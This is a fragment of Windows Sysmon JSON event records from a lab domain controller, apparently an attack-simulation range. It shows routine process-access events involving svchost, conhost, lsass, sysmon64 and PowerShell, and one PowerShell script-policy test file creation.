C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.576","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9268,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.576\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.576","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9269,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.576\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.576","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9270,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.576\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.576","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9271,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.576\r\nSourceProcessGUID: {E2A3D6B1-13D2-5F25-0000-0010631B1200}\r\nSourceProcessId: 3796\r\nSourceThreadId: 4948\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-13B8-5F25-0000-0010896E1100}\r\nTargetProcessId: 4692\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.576","SourceProcessGUID":"{E2A3D6B1-13D2-5F25-0000-0010631B1200}","SourceProcessId":"3796","SourceThreadId":"4948","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-13B8-5F25-0000-0010896E1100}","TargetProcessId":"4692","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9272,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.591\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-0010922A1200}\r\nTargetProcessId: 4692\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.591","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-0010922A1200}","TargetProcessId":"4692","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9273,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.607\r\nProcessGuid: {E2A3D6B1-13D2-5F25-0000-0010922A1200}\r\nProcessId: 4692\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_wn1lpxay.tcb.ps1\r\nCreationUtcTime: 2020-08-01 07:03:46.607","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.607","ProcessGuid":"{E2A3D6B1-13D2-5F25-0000-0010922A1200}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_wn1lpxay.tcb.ps1","CreationUtcTime":"2020-08-01 07:03:46.607","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9274,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.638\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-0010922A1200}\r\nTargetProcessId: 4692\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.638","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-0010922A1200}","TargetProcessId":"4692","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9275,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.638\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-0010922A1200}\r\nTargetProcessId: 4692\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.638","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-0010922A1200}","TargetProcessId":"4692","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
